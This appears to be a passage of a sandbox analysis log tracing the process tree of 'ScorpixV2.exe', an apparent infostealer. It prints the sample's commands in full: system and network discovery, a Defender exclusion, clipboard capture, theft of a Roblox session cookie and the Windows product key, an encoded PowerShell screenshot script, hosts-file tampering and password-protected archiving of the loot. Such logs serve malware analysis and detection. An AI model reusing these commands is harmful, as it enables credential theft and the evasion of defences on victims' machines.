C:\Windows\system32\ROUTE.EXEroute print7⤵PID:60
-
-
C:\Windows\system32\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:5632
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano7⤵
- System Network Connections Discovery
- Gathers network information
PID:5008
-
-
C:\Windows\system32\sc.exesc query type= service state= all7⤵
- Launches sc.exe
PID:5820
-
-
C:\Windows\system32\netsh.exenetsh firewall show state7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4800
-
-
C:\Windows\system32\netsh.exenetsh firewall show config7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4892 -
C:\Windows\system32\netsh.exenetsh wlan show profiles7⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:1288
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:4208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:2032
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:4944
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2280
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:5888
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵PID:5852
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵PID:5156
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:2248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3128
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:6080
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:5844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵PID:2424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:224
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2100
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:2036
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2340
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5924
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3156 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1636
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1680
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:4032
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4208 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aenkumnx\aenkumnx.cmdline"5⤵PID:4132
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5A8.tmp" "c:\Users\Admin\AppData\Local\Temp\aenkumnx\CSCC982984F37B74D259B2D4E2250EAB2FF.TMP"6⤵PID:3128
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1260
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4420
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2040
-
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4076
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2824
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3764
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3924
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2260
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:4252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:5432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:620
-
C:\Windows\system32\getmac.exegetmac4⤵PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI60242\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\NPWns.zip" *"3⤵PID:4304
-
C:\Users\Admin\AppData\Local\Temp\_MEI60242\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI60242\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\NPWns.zip" *4⤵
- Executes dropped EXE
PID:1976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:2896
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:6092
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:5688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3536
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:4200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
PID:5788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:232
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:3092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵PID:2648
-
-
-
-
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"1⤵
- Executes dropped EXE
PID:4360 -
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"2⤵
- Executes dropped EXE
PID:2696
-
-
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"1⤵
- Executes dropped EXE
PID:2032 -
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"2⤵
- Executes dropped EXE
PID:1948
-
-
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"1⤵
- Executes dropped EXE
PID:5488 -
C:\Users\Admin\Downloads\ScorpixV2.exe"C:\Users\Admin\Downloads\ScorpixV2.exe"2⤵
- Executes dropped EXE
PID:5520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2896 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb61cdcc40,0x7ffb61cdcc4c,0x7ffb61cdcc582⤵PID:2492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,12443359748867813917,7527667203547137302,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1936 /prefetch:22⤵PID:5916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2028,i,12443359748867813917,7527667203547137302,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2076 /prefetch:32⤵PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1780,i,12443359748867813917,7527667203547137302,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2440 /prefetch:82⤵PID:2388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,12443359748867813917,7527667203547137302,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3160 /prefetch:12⤵PID:6096
-
-
